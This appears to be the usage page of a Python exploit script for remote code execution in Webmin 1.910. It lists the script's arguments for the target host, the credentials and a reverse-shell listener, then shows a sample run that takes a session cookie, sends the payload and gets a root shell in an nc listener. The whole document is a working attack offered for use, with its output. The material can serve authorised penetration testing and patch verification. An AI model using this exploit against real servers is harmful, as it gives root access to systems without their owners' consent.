usage: webmin_exploit.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST
[--lport LPORT] [-u USER] -p PASSWORD [-t TARGETURI]
[-s SSL]
Webmin 1.910 - Remote Code Execution using, python3 script
optional arguments:
-h, --help show this help message and exit
--rhost RHOST Ip address of the webmin server
--rport RPORT target webmin port, default 10000
--lhost LHOST Local ip address to listen for the reverse shell
--lport LPORT The Bind port for the reverse shell Default is 4444
-u USER, --user USER The username to use for authentication By default is
admin
-p PASSWORD, --password PASSWORD
The password to use for authentication
-t TARGETURI, --TARGETURI TARGETURI
Base path for Webmin application. By default set to
"/"
-s SSL, --SSL SSL Negotiate SSL/TLS for outgoing connections. By default
ssl is set to False
$ python webmin_exploit.py --rhost 10.x.x.x --lhost 127.0.0.1 -p admin -u admin -s True --lport 9001
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************Update Surgat***********************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************
********** [+] [Exploit] The Cookie is b41b644a221d6d7b14d4b5e23012dddd
********************************************************************************************
****************************** Create payload and Exploit ***********************************
********** [+] [Exploit] Verify you nc listener on port 9001 for the incomming reverse shell
$ nc -lvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Connection from 10.x.x.x 39126 received!
id
uid=0(root) gid=0(root) groups=0(root)